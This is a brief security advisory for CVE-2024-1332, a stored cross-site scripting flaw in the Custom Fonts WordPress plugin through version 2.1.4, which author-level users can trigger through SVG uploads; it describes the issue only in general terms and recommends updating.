WordPress · Custom Fonts – Host Your Fonts Locally · CVE-2024-1332
**Name of the Vulnerable Software and Affected Versions**
Custom Fonts – Host Your Fonts Locally plugin for WordPress versions up to, and including, 2.1.4
**Description**
The issue arises from insufficient input sanitization and output escaping, allowing authenticated attackers with author level or higher to inject arbitrary web scripts in pages via svg file upload. This enables the execution of injected scripts whenever a user accesses an injected page.
**Recommendations**
For versions up to, and including, 2.1.4, update to a version that addresses the insufficient input sanitization and output escaping issue to prevent Stored Cross-Site Scripting attacks.